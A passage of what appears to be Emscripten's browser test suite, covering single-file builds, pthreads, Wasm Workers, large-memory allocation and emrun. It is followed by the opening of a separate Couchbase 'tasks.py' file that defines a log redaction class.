self.btest_exit('minimal_hello.c', args=['-sSINGLE_FILE', '-sENVIRONMENT=web', '-O2', '--closure=1'])
# Tests that SINGLE_FILE works as intended with locateFile
def test_single_file_locate_file(self):
for wasm_enabled in [True, False]:
args = [test_file('browser_test_hello_world.c'), '-o', 'test.js', '-sSINGLE_FILE']
if not wasm_enabled:
args += ['-sWASM=0']
self.compile_btest(args)
create_file('test.html', '''
<script>
var Module = {
locateFile: function (path) {
if (path.indexOf('data:') === 0) {
throw new Error('Unexpected data URI.');
}
return path;
}
};
</script>
<script src="test.js"></script>
''')
self.run_browser('test.html', None, '/report_result?0')
# Tests that SINGLE_FILE works as intended in a Worker in JS output
def test_single_file_worker_js(self):
self.compile_btest([test_file('browser_test_hello_world.c'), '-o', 'test.js', '--proxy-to-worker', '-sSINGLE_FILE'])
create_file('test.html', '<script src="test.js"></script>')
self.run_browser('test.html', None, '/report_result?0')
self.assertExists('test.js')
self.assertNotExists('test.worker.js')
# Tests that pthreads code works as intended in a Worker. That is, a pthreads-using
# program can run either on the main thread (normal tests) or when we start it in
# a Worker in this test (in that case, both the main application thread and the worker threads
# are all inside Web Workers).
@requires_threads
def test_pthreads_started_in_worker(self):
self.set_setting('EXIT_RUNTIME')
self.compile_btest([test_file('pthread/test_pthread_atomics.cpp'), '-o', 'test.js', '-sINITIAL_MEMORY=64MB', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=8'], reporting=Reporting.JS_ONLY)
create_file('test.html', '''
<script>
new Worker('test.js');
</script>
''')
self.run_browser('test.html', None, '/report_result?exit:0')
def test_access_file_after_heap_resize(self):
create_file('test.txt', 'hello from file')
self.btest_exit(test_file('access_file_after_heap_resize.c'), args=['-sALLOW_MEMORY_GROWTH', '--preload-file', 'test.txt'])
# with separate file packager invocation
self.run_process([FILE_PACKAGER, 'data.data', '--preload', 'test.txt', '--js-output=' + 'data.js'])
self.btest_exit(test_file('access_file_after_heap_resize.c'), args=['-sALLOW_MEMORY_GROWTH', '--pre-js', 'data.js', '-sFORCE_FILESYSTEM'])
def test_unicode_html_shell(self):
create_file('main.cpp', r'''
int main() {
return 0;
}
''')
create_file('shell.html', read_file(path_from_root('src/shell.html')).replace('Emscripten-Generated Code', 'Emscripten-Generated Emoji 😅'))
self.btest_exit('main.cpp', args=['--shell-file', 'shell.html'])
# Tests the functionality of the emscripten_thread_sleep() function.
@requires_threads
def test_emscripten_thread_sleep(self):
self.btest_exit(test_file('pthread/emscripten_thread_sleep.c'), args=['-sUSE_PTHREADS', '-sEXPORTED_RUNTIME_METHODS=[print]'])
# Tests that Emscripten-compiled applications can be run from a relative path in browser that is different than the address of the current page
def test_browser_run_from_different_directory(self):
self.compile_btest([test_file('browser_test_hello_world.c'), '-o', 'test.html', '-O3'])
ensure_dir('subdir')
shutil.move('test.js', Path('subdir/test.js'))
shutil.move('test.wasm', Path('subdir/test.wasm'))
src = read_file('test.html')
# Make sure JS is loaded from subdirectory
create_file('test-subdir.html', src.replace('test.js', 'subdir/test.js'))
self.run_browser('test-subdir.html', None, '/report_result?0')
# Similar to `test_browser_run_from_different_directory`, but asynchronous because of `-sMODULARIZE`
def test_browser_run_from_different_directory_async(self):
for args, creations in [
(['-sMODULARIZE'], [
'Module();', # documented way for using modularize
'new Module();' # not documented as working, but we support it
]),
]:
print(args)
# compile the code with the modularize feature and the preload-file option enabled
self.compile_btest([test_file('browser_test_hello_world.c'), '-o', 'test.js', '-O3'] + args)
ensure_dir('subdir')
shutil.move('test.js', Path('subdir/test.js'))
shutil.move('test.wasm', Path('subdir/test.wasm'))
for creation in creations:
print(creation)
# Make sure JS is loaded from subdirectory
create_file('test-subdir.html', '''
<script src="subdir/test.js"></script>
<script>
%s
</script>
''' % creation)
self.run_browser('test-subdir.html', None, '/report_result?0')
# Similar to `test_browser_run_from_different_directory`, but
# also also we eval the initial code, so currentScript is not present. That prevents us
# from finding the file in a subdir, but here we at least check we do not regress compared to the
# normal case of finding in the current dir.
def test_browser_modularize_no_current_script(self):
# test both modularize (and creating an instance) and modularize-instance
# (which creates by itself)
for path, args, creation in [
([], ['-sMODULARIZE'], 'Module();'),
(['subdir'], ['-sMODULARIZE'], 'Module();'),
]:
print(path, args, creation)
filesystem_path = os.path.join('.', *path)
ensure_dir(filesystem_path)
# compile the code with the modularize feature and the preload-file option enabled
self.compile_btest([test_file('browser_test_hello_world.c'), '-o', 'test.js'] + args)
shutil.move('test.js', Path(filesystem_path, 'test.js'))
shutil.move('test.wasm', Path(filesystem_path, 'test.wasm'))
create_file(Path(filesystem_path, 'test.html'), '''
<script>
setTimeout(function() {
var xhr = new XMLHttpRequest();
xhr.open('GET', 'test.js', false);
xhr.send(null);
eval(xhr.responseText);
%s
}, 1);
</script>
''' % creation)
self.run_browser('/'.join(path + ['test.html']), None, '/report_result?0')
def test_emscripten_request_animation_frame(self):
self.btest_exit(test_file('emscripten_request_animation_frame.c'))
def test_emscripten_request_animation_frame_loop(self):
self.btest_exit(test_file('emscripten_request_animation_frame_loop.c'))
def test_request_animation_frame(self):
self.btest_exit('request_animation_frame.cpp', also_proxied=True)
@requires_threads
def test_emscripten_set_timeout(self):
self.btest_exit(test_file('emscripten_set_timeout.c'), args=['-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD'])
@requires_threads
def test_emscripten_set_timeout_loop(self):
self.btest_exit(test_file('emscripten_set_timeout_loop.c'), args=['-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD'])
def test_emscripten_set_immediate(self):
self.btest_exit(test_file('emscripten_set_immediate.c'))
def test_emscripten_set_immediate_loop(self):
self.btest_exit(test_file('emscripten_set_immediate_loop.c'))
@requires_threads
def test_emscripten_set_interval(self):
self.btest_exit(test_file('emscripten_set_interval.c'), args=['-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD'])
# Test emscripten_performance_now() and emscripten_date_now()
@requires_threads
def test_emscripten_performance_now(self):
self.btest(test_file('emscripten_performance_now.c'), '0', args=['-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD'])
@requires_threads
def test_embind_with_pthreads(self):
self.btest_exit(test_file('embind/test_pthreads.cpp'), args=['--bind', '-pthread', '-sPTHREAD_POOL_SIZE=2'])
def test_embind_with_asyncify(self):
self.btest('embind_with_asyncify.cpp', '1', args=['--bind', '-sASYNCIFY'])
# Test emscripten_console_log(), emscripten_console_warn() and emscripten_console_error()
def test_emscripten_console_log(self):
self.btest_exit(test_file('emscripten_console_log.c'), args=['--pre-js', test_file('emscripten_console_log_pre.js')])
def test_emscripten_throw_number(self):
self.btest(test_file('emscripten_throw_number.c'), '0', args=['--pre-js', test_file('emscripten_throw_number_pre.js')])
def test_emscripten_throw_string(self):
self.btest(test_file('emscripten_throw_string.c'), '0', args=['--pre-js', test_file('emscripten_throw_string_pre.js')])
# Tests that Closure run in combination with -sENVIRONMENT=web mode works with a minimal console.log() application
def test_closure_in_web_only_target_environment_console_log(self):
self.btest_exit('minimal_hello.c', args=['-sENVIRONMENT=web', '-O3', '--closure=1'])
# Tests that Closure run in combination with -sENVIRONMENT=web mode works with a small WebGL application
@requires_graphics_hardware
def test_closure_in_web_only_target_environment_webgl(self):
self.btest_exit('webgl_draw_triangle.c', args=['-lGL', '-sENVIRONMENT=web', '-O3', '--closure=1'])
def test_no_declare_asm_module_exports_asmjs(self):
# TODO(sbc): Fix closure warnings with MODULARIZE + WASM=0
self.ldflags.remove('-sCLOSURE_WARNINGS=error')
for minimal_runtime in [[], ['-sMINIMAL_RUNTIME']]:
self.btest(test_file('declare_asm_module_exports.cpp'), '1', args=['-sDECLARE_ASM_MODULE_EXPORTS=0', '-sENVIRONMENT=web', '-O3', '--closure=1', '-sWASM=0'] + minimal_runtime)
def test_no_declare_asm_module_exports_wasm_minimal_runtime(self):
for mode in [1, 2]:
self.btest(test_file('declare_asm_module_exports.cpp'), '1', args=['-sDECLARE_ASM_MODULE_EXPORTS=0', '-sENVIRONMENT=web', '-O3', '--closure=1', f'-sMINIMAL_RUNTIME={mode}'])
# Tests that the different code paths in src/shell_minimal_runtime.html all work ok.
def test_minimal_runtime_loader_shell(self):
args = ['-sMINIMAL_RUNTIME=2']
for wasm in [[], ['-sWASM=0', '--memory-init-file', '0'], ['-sWASM=0', '--memory-init-file', '1'], ['-sSINGLE_FILE'], ['-sWASM=0', '-sSINGLE_FILE']]:
for modularize in [[], ['-sMODULARIZE']]:
print(str(args + wasm + modularize))
self.btest_exit('minimal_hello.c', args=args + wasm + modularize)
# Tests that -sMINIMAL_RUNTIME works well in different build modes
def test_minimal_runtime_hello_world(self):
for args in [
[],
['-sMINIMAL_RUNTIME_STREAMING_WASM_COMPILATION', '--closure=1'],
['-sMINIMAL_RUNTIME_STREAMING_WASM_INSTANTIATION', '--closure=1']
]:
self.btest_exit(test_file('small_hello_world.c'), args=args + ['-sMINIMAL_RUNTIME'])
@requires_threads
def test_offset_converter(self, *args):
self.btest_exit(test_file('browser/test_offset_converter.c'), assert_returncode=1, args=['-sUSE_OFFSET_CONVERTER', '-gsource-map', '-sPROXY_TO_PTHREAD', '-sUSE_PTHREADS'])
# Tests emscripten_unwind_to_js_event_loop() behavior
def test_emscripten_unwind_to_js_event_loop(self, *args):
self.btest_exit(test_file('test_emscripten_unwind_to_js_event_loop.c'))
def test_wasm2js_fallback(self):
self.set_setting('EXIT_RUNTIME')
for args in [[], ['-sMINIMAL_RUNTIME']]:
self.compile_btest([test_file('small_hello_world.c'), '-sWASM=2', '-o', 'test.html'] + args)
# First run with WebAssembly support enabled
# Move the Wasm2js fallback away to test it is not accidentally getting loaded.
os.rename('test.wasm.js', 'test.wasm.js.unused')
self.run_browser('test.html', 'hello!', '/report_result?exit:0')
os.rename('test.wasm.js.unused', 'test.wasm.js')
# Then disable WebAssembly support in VM, and try again.. Should still work with Wasm2JS fallback.
html = read_file('test.html')
html = html.replace('<body>', '<body><script>delete WebAssembly;</script>')
create_file('test.html', html)
os.remove('test.wasm') # Also delete the Wasm file to test that it is not attempted to be loaded.
self.run_browser('test.html', 'hello!', '/report_result?exit:0')
def test_wasm2js_fallback_on_wasm_compilation_failure(self):
self.set_setting('EXIT_RUNTIME')
for args in [[], ['-sMINIMAL_RUNTIME']]:
self.compile_btest([test_file('small_hello_world.c'), '-sWASM=2', '-o', 'test.html'] + args)
# Run without the .wasm.js file present: with Wasm support, the page should still run
os.rename('test.wasm.js', 'test.wasm.js.unused')
self.run_browser('test.html', 'hello!', '/report_result?exit:0')
# Restore the .wasm.js file, then corrupt the .wasm file, that should trigger the Wasm2js fallback to run
os.rename('test.wasm.js.unused', 'test.wasm.js')
shutil.copyfile('test.js', 'test.wasm')
self.run_browser('test.html', 'hello!', '/report_result?exit:0')
def test_system(self):
self.btest_exit(test_file('system.c'))
# Tests the hello_wasm_worker.c documentation example code.
@also_with_minimal_runtime
def test_wasm_worker_hello(self):
self.btest(test_file('wasm_worker/hello_wasm_worker.c'), expected='0', args=['-sWASM_WORKERS'])
def test_wasm_worker_hello_minimal_runtime_2(self):
self.btest(test_file('wasm_worker/hello_wasm_worker.c'), expected='0', args=['-sWASM_WORKERS', '-sMINIMAL_RUNTIME=2'])
# Tests Wasm Workers build in Wasm2JS mode.
@also_with_minimal_runtime
def test_wasm_worker_hello_wasm2js(self):
self.btest(test_file('wasm_worker/hello_wasm_worker.c'), expected='0', args=['-sWASM_WORKERS', '-sWASM=0'])
# Tests the WASM_WORKERS=2 build mode, which embeds the Wasm Worker bootstrap JS script file to the main JS file.
@also_with_minimal_runtime
def test_wasm_worker_embedded(self):
self.btest(test_file('wasm_worker/hello_wasm_worker.c'), expected='0', args=['-sWASM_WORKERS=2'])
# Tests Wasm Worker thread stack setup
@also_with_minimal_runtime
def test_wasm_worker_thread_stack(self):
for mode in [0, 1, 2]:
self.btest(test_file('wasm_worker/thread_stack.c'), expected='0', args=['-sWASM_WORKERS', f'-sSTACK_OVERFLOW_CHECK={mode}'])
# Tests emscripten_malloc_wasm_worker() and emscripten_current_thread_is_wasm_worker() functions
@also_with_minimal_runtime
def test_wasm_worker_malloc(self):
self.btest(test_file('wasm_worker/malloc_wasm_worker.c'), expected='0', args=['-sWASM_WORKERS'])
# Tests Wasm Worker+pthreads simultaneously
@also_with_minimal_runtime
def test_wasm_worker_and_pthreads(self):
self.btest(test_file('wasm_worker/wasm_worker_and_pthread.c'), expected='0', args=['-sWASM_WORKERS', '-pthread'])
# Tests emscripten_wasm_worker_self_id() function
@also_with_minimal_runtime
def test_wasm_worker_self_id(self):
self.btest(test_file('wasm_worker/wasm_worker_self_id.c'), expected='0', args=['-sWASM_WORKERS'])
# Tests direct Wasm Assembly .S file based TLS variables in Wasm Workers
@also_with_minimal_runtime
def test_wasm_worker_tls_wasm_assembly(self):
self.btest(test_file('wasm_worker/wasm_worker_tls_wasm_assembly.c'),
expected='42', args=['-sWASM_WORKERS', test_file('wasm_worker/wasm_worker_tls_wasm_assembly.S')])
# Tests C++11 keyword thread_local for TLS in Wasm Workers
@also_with_minimal_runtime
def test_wasm_worker_cpp11_thread_local(self):
self.btest(test_file('wasm_worker/cpp11_thread_local.cpp'), expected='42', args=['-sWASM_WORKERS'])
# Tests C11 keyword _Thread_local for TLS in Wasm Workers
@also_with_minimal_runtime
def test_wasm_worker_c11__Thread_local(self):
self.btest(test_file('wasm_worker/c11__Thread_local.c'), expected='42', args=['-sWASM_WORKERS', '-std=gnu11']) # Cannot test C11 - because of EM_ASM must test Gnu11.
# Tests GCC specific extension keyword __thread for TLS in Wasm Workers
@also_with_minimal_runtime
def test_wasm_worker_gcc___thread(self):
self.btest(test_file('wasm_worker/gcc___Thread.c'), expected='42', args=['-sWASM_WORKERS', '-std=gnu11'])
# Tests emscripten_wasm_worker_sleep()
@also_with_minimal_runtime
def test_wasm_worker_sleep(self):
self.btest(test_file('wasm_worker/wasm_worker_sleep.c'), expected='1', args=['-sWASM_WORKERS'])
# Tests emscripten_terminate_wasm_worker()
@also_with_minimal_runtime
def test_wasm_worker_terminate(self):
self.btest(test_file('wasm_worker/terminate_wasm_worker.c'), expected='0', args=['-sWASM_WORKERS'])
# Tests emscripten_terminate_all_wasm_workers()
@also_with_minimal_runtime
def test_wasm_worker_terminate_all(self):
self.btest(test_file('wasm_worker/terminate_all_wasm_workers.c'), expected='0', args=['-sWASM_WORKERS'])
# Tests emscripten_wasm_worker_post_function_*() API
@also_with_minimal_runtime
def test_wasm_worker_post_function(self):
self.btest(test_file('wasm_worker/post_function.c'), expected='8', args=['-sWASM_WORKERS'])
# Tests emscripten_wasm_worker_post_function_*() API and EMSCRIPTEN_WASM_WORKER_ID_PARENT
# to send a message back from Worker to its parent thread.
@also_with_minimal_runtime
def test_wasm_worker_post_function_to_main_thread(self):
self.btest(test_file('wasm_worker/post_function_to_main_thread.c'), expected='10', args=['-sWASM_WORKERS'])
# Tests emscripten_navigator_hardware_concurrency() and emscripten_atomics_is_lock_free()
@also_with_minimal_runtime
def test_wasm_worker_hardware_concurrency_is_lock_free(self):
self.btest(test_file('wasm_worker/hardware_concurrency_is_lock_free.c'), expected='0', args=['-sWASM_WORKERS'])
# Tests emscripten_wasm_wait_i32() and emscripten_wasm_notify() functions.
@also_with_minimal_runtime
def test_wasm_worker_wait32_notify(self):
self.btest(test_file('wasm_worker/wait32_notify.c'), expected='2', args=['-sWASM_WORKERS'])
# Tests emscripten_wasm_wait_i64() and emscripten_wasm_notify() functions.
@also_with_minimal_runtime
def test_wasm_worker_wait64_notify(self):
self.btest(test_file('wasm_worker/wait64_notify.c'), expected='2', args=['-sWASM_WORKERS'])
# Tests emscripten_atomic_wait_async() function.
@also_with_minimal_runtime
def test_wasm_worker_wait_async(self):
self.btest(test_file('wasm_worker/wait_async.c'), expected='0', args=['-sWASM_WORKERS'])
# Tests emscripten_atomic_cancel_wait_async() function.
@also_with_minimal_runtime
def test_wasm_worker_cancel_wait_async(self):
self.btest(test_file('wasm_worker/cancel_wait_async.c'), expected='1', args=['-sWASM_WORKERS'])
# Tests emscripten_atomic_cancel_all_wait_asyncs() function.
@also_with_minimal_runtime
def test_wasm_worker_cancel_all_wait_asyncs(self):
self.btest(test_file('wasm_worker/cancel_all_wait_asyncs.c'), expected='1', args=['-sWASM_WORKERS'])
# Tests emscripten_atomic_cancel_all_wait_asyncs_at_address() function.
@also_with_minimal_runtime
def test_wasm_worker_cancel_all_wait_asyncs_at_address(self):
self.btest(test_file('wasm_worker/cancel_all_wait_asyncs_at_address.c'), expected='1', args=['-sWASM_WORKERS'])
# Tests emscripten_lock_init(), emscripten_lock_waitinf_acquire() and emscripten_lock_release()
@also_with_minimal_runtime
def test_wasm_worker_lock_waitinf(self):
self.btest(test_file('wasm_worker/lock_waitinf_acquire.c'), expected='4000', args=['-sWASM_WORKERS'])
# Tests emscripten_lock_wait_acquire() and emscripten_lock_try_acquire() in Worker.
@also_with_minimal_runtime
def test_wasm_worker_lock_wait(self):
self.btest(test_file('wasm_worker/lock_wait_acquire.c'), expected='0', args=['-sWASM_WORKERS'])
# Tests emscripten_lock_wait_acquire() between two Wasm Workers.
@also_with_minimal_runtime
def test_wasm_worker_lock_wait2(self):
self.btest(test_file('wasm_worker/lock_wait_acquire2.c'), expected='0', args=['-sWASM_WORKERS'])
# Tests emscripten_lock_async_acquire() function.
@also_with_minimal_runtime
def test_wasm_worker_lock_async_acquire(self):
self.btest(test_file('wasm_worker/lock_async_acquire.c'), expected='0', args=['--closure=1', '-sWASM_WORKERS'])
# Tests emscripten_lock_busyspin_wait_acquire() in Worker and main thread.
@also_with_minimal_runtime
def test_wasm_worker_lock_busyspin_wait(self):
self.btest(test_file('wasm_worker/lock_busyspin_wait_acquire.c'), expected='0', args=['-sWASM_WORKERS'])
# Tests emscripten_lock_busyspin_waitinf_acquire() in Worker and main thread.
@also_with_minimal_runtime
def test_wasm_worker_lock_busyspin_waitinf(self):
self.btest(test_file('wasm_worker/lock_busyspin_waitinf_acquire.c'), expected='1', args=['-sWASM_WORKERS'])
# Tests that proxied JS functions cannot be called from Wasm Workers
@also_with_minimal_runtime
def test_wasm_worker_no_proxied_js_functions(self):
self.btest(test_file('wasm_worker/no_proxied_js_functions.c'), expected='0',
args=['--js-library', test_file('wasm_worker/no_proxied_js_functions.js'), '-sWASM_WORKERS', '-sASSERTIONS'])
# Tests emscripten_semaphore_init(), emscripten_semaphore_waitinf_acquire() and emscripten_semaphore_release()
@also_with_minimal_runtime
def test_wasm_worker_semaphore_waitinf_acquire(self):
self.btest(test_file('wasm_worker/semaphore_waitinf_acquire.c'), expected='0', args=['-sWASM_WORKERS'])
# Tests emscripten_semaphore_try_acquire() on the main thread
@also_with_minimal_runtime
def test_wasm_worker_semaphore_try_acquire(self):
self.btest(test_file('wasm_worker/semaphore_try_acquire.c'), expected='0', args=['-sWASM_WORKERS'])
@no_firefox('no 4GB support yet')
@requires_v8
def test_zzz_zzz_4gb(self):
# TODO Convert to an actual browser test when it reaches stable.
# For now, keep this in browser as this suite runs serially, which
# means we don't compete for memory with anything else (and run it
# at the very very end, to reduce the risk of it OOM-killing the
# browser).
# test that we can allocate in the 2-4GB range, if we enable growth and
# set the max appropriately
self.emcc_args += ['-O2', '-sALLOW_MEMORY_GROWTH', '-sMAXIMUM_MEMORY=4GB']
self.do_run_in_out_file_test('browser', 'test_4GB.cpp')
# Tests that emmalloc supports up to 4GB Wasm heaps.
@no_firefox('no 4GB support yet')
def test_zzz_zzz_emmalloc_4gb(self):
self.btest(test_file('mem_growth.cpp'),
expected='-65536', # == 4*1024*1024*1024 - 65536 casted to signed
args=['-sMALLOC=emmalloc', '-sABORTING_MALLOC=0', '-sALLOW_MEMORY_GROWTH=1', '-sMAXIMUM_MEMORY=4GB'])
# Test that it is possible to malloc() a huge 3GB memory block in 4GB mode using emmalloc.
# Also test emmalloc-memvalidate and emmalloc-memvalidate-verbose build configurations.
@no_firefox('no 4GB support yet')
def test_emmalloc_3GB(self):
def test(args):
self.btest_exit(test_file('alloc_3gb.cpp'),
args=['-sMAXIMUM_MEMORY=4GB', '-sALLOW_MEMORY_GROWTH=1'] + args)
test(['-sMALLOC=emmalloc'])
test(['-sMALLOC=emmalloc-debug'])
test(['-sMALLOC=emmalloc-memvalidate'])
test(['-sMALLOC=emmalloc-memvalidate-verbose'])
@parameterized({
# the fetch backend works even on the main thread: we proxy to a background
# thread and busy-wait
'main_thread': (['-sPTHREAD_POOL_SIZE=4'],),
# using proxy_to_pthread also works, of course
'proxy_to_pthread': (['-sPROXY_TO_PTHREAD', '-sINITIAL_MEMORY=32MB', '-DPROXYING'],),
})
@requires_threads
def test_wasmfs_fetch_backend(self, args):
if is_firefox() and '-sPROXY_TO_PTHREAD' not in args:
return self.skipTest('ff hangs on the main_thread version. browser bug?')
create_file('data.dat', 'hello, fetch')
create_file('test.txt', 'fetch 2')
try_delete('subdir')
ensure_dir('subdir')
create_file('subdir/backendfile', 'file 1')
create_file('subdir/backendfile2', 'file 2')
self.btest_exit(test_file('wasmfs/wasmfs_fetch.c'),
args=['-sWASMFS', '-sUSE_PTHREADS', '--js-library', test_file('wasmfs/wasmfs_fetch.js')] + args)
@requires_threads
@no_firefox('no OPFS support yet')
def test_wasmfs_opfs(self):
test = test_file('wasmfs/wasmfs_opfs.c')
args = ['-sWASMFS', '-pthread', '-sPROXY_TO_PTHREAD', '-O3']
self.btest_exit(test, args=args + ['-DWASMFS_SETUP'])
self.btest_exit(test, args=args + ['-DWASMFS_RESUME'])
@no_firefox('no 4GB support yet')
def test_zzz_zzz_emmalloc_memgrowth(self, *args):
self.btest(test_file('browser/emmalloc_memgrowth.cpp'), expected='0', args=['-sMALLOC=emmalloc', '-sALLOW_MEMORY_GROWTH=1', '-sABORTING_MALLOC=0', '-sASSERTIONS=2', '-sMINIMAL_RUNTIME=1', '-sMAXIMUM_MEMORY=4GB'])
@no_firefox('no 4GB support yet')
@requires_v8
def test_zzz_zzz_2gb_fail(self):
# TODO Convert to an actual browser test when it reaches stable.
# For now, keep this in browser as this suite runs serially, which
# means we don't compete for memory with anything else (and run it
# at the very very end, to reduce the risk of it OOM-killing the
# browser).
# test that growth doesn't go beyond 2GB without the max being set for that,
# and that we can catch an allocation failure exception for that
self.emcc_args += ['-O2', '-sALLOW_MEMORY_GROWTH', '-sMAXIMUM_MEMORY=2GB']
self.do_run_in_out_file_test('browser', 'test_2GB_fail.cpp')
@no_firefox('no 4GB support yet')
@requires_v8
def test_zzz_zzz_4gb_fail(self):
# TODO Convert to an actual browser test when it reaches stable.
# For now, keep this in browser as this suite runs serially, which
# means we don't compete for memory with anything else (and run it
# at the very very end, to reduce the risk of it OOM-killing the
# browser).
# test that we properly report an allocation error that would overflow over
# 4GB.
self.emcc_args += ['-O2', '-sALLOW_MEMORY_GROWTH', '-sMAXIMUM_MEMORY=4GB', '-sABORTING_MALLOC=0']
self.do_run_in_out_file_test('browser', 'test_4GB_fail.cpp')
# Tests that Emscripten-compiled applications can be run when a slash in the URL query or fragment of the js file
def test_browser_run_with_slash_in_query_and_hash(self):
self.compile_btest([test_file('browser_test_hello_world.c'), '-o', 'test.html', '-O0'])
src = open('test.html').read()
# Slash in query
create_file('test-query.html', src.replace('test.js', 'test.js?type=pass/fail'))
self.run_browser('test-query.html', None, '/report_result?0')
# Slash in fragment
create_file('test-hash.html', src.replace('test.js', 'test.js#pass/fail'))
self.run_browser('test-hash.html', None, '/report_result?0')
# Slash in query and fragment
create_file('test-query-hash.html', src.replace('test.js', 'test.js?type=pass/fail#pass/fail'))
self.run_browser('test-query-hash.html', None, '/report_result?0')
@disabled("only run this manually, to test for race conditions")
@parameterized({
'normal': ([],),
'assertions': (['-sASSERTIONS'],)
})
@requires_threads
def test_manual_pthread_proxy_hammer(self, args):
# the specific symptom of the hang that was fixed is that the test hangs
# at some point, using 0% CPU. often that occured in 0-200 iterations, but
# you may want to adjust "ITERATIONS".
self.btest_exit(test_file('pthread/test_pthread_proxy_hammer.cpp'),
args=['-sUSE_PTHREADS', '-O2', '-sPROXY_TO_PTHREAD',
'-DITERATIONS=1024', '-g1'] + args,
timeout=10000,
# don't run this with the default extra_tries value, as this is
# *meant* to notice something random, a race condition.
extra_tries=0)
def test_assert_failure(self):
self.btest(test_file('browser/test_assert_failure.c'), 'abort:Assertion failed: false && "this is a test"')
def test_full_js_library_strict(self):
self.btest_exit(test_file('hello_world.c'), args=['-sINCLUDE_FULL_LIBRARY', '-sSTRICT_JS'])
class emrun(RunnerCore):
def test_emrun_info(self):
if not has_browser():
self.skipTest('need a browser')
result = self.run_process([EMRUN, '--system_info', '--browser_info'], stdout=PIPE).stdout
assert 'CPU' in result
assert 'Browser' in result
assert 'Traceback' not in result
result = self.run_process([EMRUN, '--list_browsers'], stdout=PIPE).stdout
assert 'Traceback' not in result
def test_no_browser(self):
# Test --no_browser mode where we have to take care of launching the browser ourselves
# and then killing emrun when we are done.
if not has_browser():
self.skipTest('need a browser')
self.run_process([EMCC, test_file('test_emrun.c'), '--emrun', '-o', 'hello_world.html'])
proc = subprocess.Popen([EMRUN, '--no_browser', '.', '--port=3333'], stdout=PIPE)
try:
if EMTEST_BROWSER:
print('Starting browser')
browser_cmd = shlex.split(EMTEST_BROWSER)
browser = subprocess.Popen(browser_cmd + ['http://localhost:3333/hello_world.html'])
try:
while True:
stdout = proc.stdout.read()
if b'Dumping out file' in stdout:
break
finally:
print('Terminating browser')
browser.terminate()
browser.wait()
finally:
print('Terminating emrun server')
proc.terminate()
proc.wait()
def test_emrun(self):
self.run_process([EMCC, test_file('test_emrun.c'), '--emrun', '-o', 'hello_world.html'])
if not has_browser():
self.skipTest('need a browser')
# We cannot run emrun from the temp directory the suite will clean up afterwards, since the
# browser that is launched will have that directory as startup directory, and the browser will
# not close as part of the test, pinning down the cwd on Windows and it wouldn't be possible to
# delete it. Therefore switch away from that directory before launching.
os.chdir(path_from_root())
args_base = [EMRUN, '--timeout', '30', '--safe_firefox_profile',
'--kill_exit', '--port', '6939', '--verbose',
'--log_stdout', self.in_dir('stdout.txt'),
'--log_stderr', self.in_dir('stderr.txt')]
# Verify that trying to pass argument to the page without the `--` separator will
# generate an actionable error message
err = self.expect_fail(args_base + ['--foo'])
self.assertContained('error: unrecognized arguments: --foo', err)
self.assertContained('remember to add `--` between arguments', err)
if EMTEST_BROWSER is not None:
# If EMTEST_BROWSER carried command line arguments to pass to the browser,
# (e.g. "firefox -profile /path/to/foo") those can't be passed via emrun,
# so strip them out.
browser_cmd = shlex.split(EMTEST_BROWSER)
browser_path = browser_cmd[0]
args_base += ['--browser', browser_path]
if len(browser_cmd) > 1:
browser_args = browser_cmd[1:]
if 'firefox' in browser_path and ('-profile' in browser_args or '--profile' in browser_args):
# emrun uses its own -profile, strip it out
parser = argparse.ArgumentParser(add_help=False) # otherwise it throws with -headless
parser.add_argument('-profile')
parser.add_argument('--profile')
browser_args = parser.parse_known_args(browser_args)[1]
if browser_args:
args_base += ['--browser_args', ' ' + ' '.join(browser_args)]
for args in [
args_base,
args_base + ['--private_browsing', '--port', '6941'],
args_base + ['--dump_out_directory', 'other dir/multiple', '--port', '6942']
]:
args += [self.in_dir('hello_world.html'), '--', '1', '2', '--3']
print(shared.shlex_join(args))
proc = self.run_process(args, check=False)
self.assertEqual(proc.returncode, 100)
dump_dir = 'other dir/multiple' if '--dump_out_directory' in args else 'dump_out'
self.assertExists(self.in_dir(f'{dump_dir}/test.dat'))
self.assertExists(self.in_dir(f'{dump_dir}/heap.dat'))
self.assertExists(self.in_dir(f'{dump_dir}/nested/with space.dat'))
stdout = read_file(self.in_dir('stdout.txt'))
stderr = read_file(self.in_dir('stderr.txt'))
self.assertContained('argc: 4', stdout)
self.assertContained('argv[3]: --3', stdout)
self.assertContained('hello, world!', stdout)
self.assertContained('Testing ASCII characters: !"$%&\'()*+,-./:;<=>?@[\\]^_`{|}~', stdout)
self.assertContained('Testing char sequences: %20%21 ä', stdout)
self.assertContained('hello, error stream!', stderr)
|
tasks.py
|
#!/usr/bin/env python
"""
Copyright 2016-Present Couchbase, Inc.
Use of this software is governed by the Business Source License included in
the file licenses/BSL-Couchbase.txt. As of the Change Date specified in that
file, in accordance with the Business Source License, use of this software will
be governed by the Apache License, Version 2.0, included in the file
licenses/APL2.txt.
"""
# -*- python -*-
import atexit
import base64
import glob
import gzip
import hashlib
import io
import mmap
import optparse
import os
import re
import shutil
import signal
import socket
import subprocess
import sys
import tempfile
import threading
import time
import traceback
import urllib.error
import urllib.parse
import urllib.request
# The 'latin-1' encoding is being used since we can't guarantee that all bytes that will be
# processed through sgcollect will be decodable from 'utf-8' (which is the default in Python)
# and the decoder may fail if it encounters any such byte sequence whilst decoding byte strings.
# The 'latin-1' encoding belongs to the ISO-8859 family and is capable of decoding any byte sequence.
ENCODING_LATIN1 = 'latin-1'
# Error handler is being used to handle special cases on Windows platforms when the cp1252
# encoding is referred to as 'latin-1', it does not map all possible byte values.
BACKSLASH_REPLACE = 'backslashreplace'
class LogRedactor:
def __init__(self, salt, tmpdir):
self.target_dir = os.path.join(tmpdir, "redacted")
os.makedirs(self.target_dir)
self.couchbase_log = CouchbaseLogProcessor(salt)
self.regular_log = RegularLogProcessor(salt)
def _process_file(self, ifile, ofile, processor):
try:
with open(ifile, 'r', newline='', encoding=ENCODING_LATIN1, errors=BACKSLASH_REPLACE) as inp:
with open(ofile, 'w+', newline='', encoding=ENCODING_LATIN1, errors=BACKSLASH_REPLACE) as out:
# Write redaction header
out.write(self.couchbase_log.do("RedactLevel"))
for line in inp:
out.write(processor.do(line))
except IOError as e:
log("I/O error(%s): %s" % (e.errno, e.strerror))
def redact_file(self, name, ifile):
_, filename = os.path.split(name)
ofile = os.path.join(self.target_dir, filename)
self._process_file(ifile, ofile, self.regular_log)
